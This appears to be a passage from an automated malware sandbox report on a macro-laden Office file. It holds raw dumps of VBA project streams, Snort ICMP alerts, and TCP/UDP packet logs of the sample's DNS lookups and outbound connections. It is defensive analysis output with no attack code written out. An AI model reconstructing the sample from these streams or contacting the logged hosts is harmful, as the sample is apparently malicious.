                                                                                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 03 00 00 08 09 00 00 00 4d 76 56 44 74 66 73 59 31 03 00 00 08 09 00 00 00 4a 4c 7a 57 44 76 47 46 6d 6c 00 00 7f 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 6152
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_2
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:6152
                                                                                                                                                                                                            Entropy:4.28073400057
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . Q . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . . . Y . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . .
                                                                                                                                                                                                            Data Raw:72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 1d 00 00 00 36 00 00 00 51 0a 00 00 00 00 00 00 39 0a 00 00 00 00 00 00 89 02 00 00 00 00 02 00 81 0a 00 00 00 00 00 00 69 0a 00 00 00 00 00 00 b1 0a 00 00 00 00 00 00 99 0a 00 00 00 00 00 00 c9 0a 00 00 00 00
                                                                                                                                                                                                            Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 1157
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/__SRP_3
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:1157
                                                                                                                                                                                                            Entropy:2.39133589617
                                                                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . ! . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . $ . I . . . . . . . . . . ` . . . . .
                                                                                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 24 00 a9 00 00 00 00 00 02 00 01 00 00 60 00 00 fc ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 0f 24 00
                                                                                                                                                                                                            Stream Path: VBA/dir, File Type: data, Stream Size: 466
                                                                                                                                                                                                            General
                                                                                                                                                                                                            Stream Path:VBA/dir
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Stream Size:466
                                                                                                                                                                                                            Entropy:6.14668442859
                                                                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                                                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 3 . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                                                                            Data Raw:01 ce b1 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 33 03 ee 61 19 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            01/13/21-13:44:28.704347ICMP382ICMP PING Windows192.168.2.22172.217.218.139
                                                                                                                                                                                                            01/13/21-13:44:28.704347ICMP384ICMP PING192.168.2.22172.217.218.139
                                                                                                                                                                                                            01/13/21-13:44:28.752557ICMP408ICMP Echo Reply172.217.218.139192.168.2.22
                                                                                                                                                                                                            01/13/21-13:44:39.425379ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:39.425379ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:39.473256ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:44:40.309136ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:40.309136ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:40.357440ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:44:54.943988ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:54.943988ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:44:54.991950ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:45:07.769872ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:07.769872ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:07.817836ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:45:16.402306ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:16.402306ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:16.450089ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:45:26.420128ICMP382ICMP PING Windows192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:26.420128ICMP384ICMP PING192.168.2.22172.217.218.102
                                                                                                                                                                                                            01/13/21-13:45:26.468019ICMP408ICMP Echo Reply172.217.218.102192.168.2.22
                                                                                                                                                                                                            01/13/21-13:45:29.676235ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                                                                            01/13/21-13:45:49.689493ICMP382ICMP PING Windows192.168.2.22172.217.218.139
                                                                                                                                                                                                            01/13/21-13:45:49.689493ICMP384ICMP PING192.168.2.22172.217.218.139
                                                                                                                                                                                                            01/13/21-13:45:49.737658ICMP408ICMP Echo Reply172.217.218.139192.168.2.22

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.737415075 CET4916780192.168.2.2267.199.248.16
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.786787987 CET804916767.199.248.16192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.786874056 CET4916780192.168.2.2267.199.248.16
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.788650990 CET4916780192.168.2.2267.199.248.16
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.837110996 CET804916767.199.248.16192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.931399107 CET804916767.199.248.16192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.931528091 CET4916780192.168.2.2267.199.248.16
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.077334881 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.125226974 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.125323057 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.158297062 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206696987 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206747055 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206795931 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206815004 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206845045 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206878901 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206911087 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206926107 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.206955910 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.218302965 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.266429901 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.266521931 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.684679031 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.737174034 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.338148117 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.338385105 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344692945 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344726086 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344754934 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344775915 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344810009 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344820023 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.344822884 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365524054 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365571976 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365602016 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365736961 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.365767002 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369362116 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369442940 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369494915 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.369519949 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372374058 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372406006 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.372509003 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429142952 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429317951 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429361105 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429414034 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429454088 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.429487944 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.434963942 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435003042 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435097933 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.435997963 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436554909 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436602116 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.436682940 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439702988 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439744949 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.439806938 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.442970991 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.443578959 CET44349168108.177.127.132192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.443660975 CET49168443192.168.2.22108.177.127.132
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.084743023 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.131266117 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.131381989 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.147083044 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.193034887 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194680929 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194725037 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.194796085 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.208478928 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.254933119 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.255269051 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.464607954 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.503458023 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.504455090 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.524163961 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.570153952 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150634050 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150665045 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150676012 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150686979 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150695086 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150706053 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150721073 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.150950909 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151637077 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151663065 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.151740074 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152674913 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152693987 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.152786016 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153299093 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153326988 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.153419971 CET49174443192.168.2.22104.18.49.20
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.154486895 CET44349174104.18.49.20192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:30.154514074 CET44349174104.18.49.20192.168.2.22

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.673477888 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.722846985 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.009288073 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.073410034 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.424066067 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.489083052 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.489990950 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.548269987 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:25.648607969 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:25.715763092 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:28.587493896 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:28.644560099 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:28.651949883 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:28.700452089 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.015083075 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.071233988 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.369704962 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.433773041 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.619276047 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.686795950 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.687319040 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.746385098 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:33.324801922 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:33.381355047 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:35.042046070 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:35.098671913 CET53575648.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:39.305635929 CET6300953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:39.362576962 CET53630098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:39.365454912 CET5931953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:39.424384117 CET53593198.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.186141014 CET5307053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.197665930 CET5977053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.242908955 CET53530708.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.245507956 CET53597708.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.247988939 CET6152353192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.305908918 CET53615238.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.971148968 CET6279153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.027657986 CET53627918.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.990853071 CET5066753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.991761923 CET5412953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.039572001 CET53541298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.057894945 CET53506678.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.801377058 CET6532953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:42.859409094 CET53653298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.811579943 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.877253056 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.878504038 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938445091 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938976049 CET6071853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:47.003381014 CET53607188.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.897459030 CET4915753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.962050915 CET53491578.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:50.289427996 CET5739153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:50.346026897 CET53573918.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.222888947 CET6185853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.287549019 CET53618588.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.813502073 CET6250053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.869791985 CET53625008.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.872222900 CET5165253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.936516047 CET53516528.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.485379934 CET6276253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.560195923 CET53627628.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.310018063 CET5690553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.366463900 CET53569058.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:44:57.509673119 CET5460953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:44:57.576920986 CET53546098.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.749346018 CET5810153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.816950083 CET53581018.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.978214979 CET6432953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.037471056 CET53643298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.609417915 CET6432953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.670631886 CET53643298.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.117901087 CET6488153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.182449102 CET53648818.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.183072090 CET6488153192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.239538908 CET53648818.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.281723976 CET5532753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.338166952 CET53553278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:06.696155071 CET5915053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:06.755399942 CET53591508.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.640511990 CET6343953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.699605942 CET53634398.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.707274914 CET6504053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:07.768819094 CET53650408.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.290165901 CET6136953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.338649988 CET53613698.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.340930939 CET6551553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.399693012 CET53655158.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.629877090 CET6023653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.686925888 CET53602368.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:18.564466953 CET5319853192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:18.628879070 CET53531988.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.097852945 CET5002753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.157201052 CET53500278.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.104094982 CET5924553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.164253950 CET53592458.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.302629948 CET5584053192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.358843088 CET53558408.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.362325907 CET6166753192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.418745995 CET53616678.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.561464071 CET6373653192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.620728016 CET53637368.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.614391088 CET5980553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.625468016 CET6232253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.673316956 CET53623228.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.678914070 CET53598058.8.8.8192.168.2.22
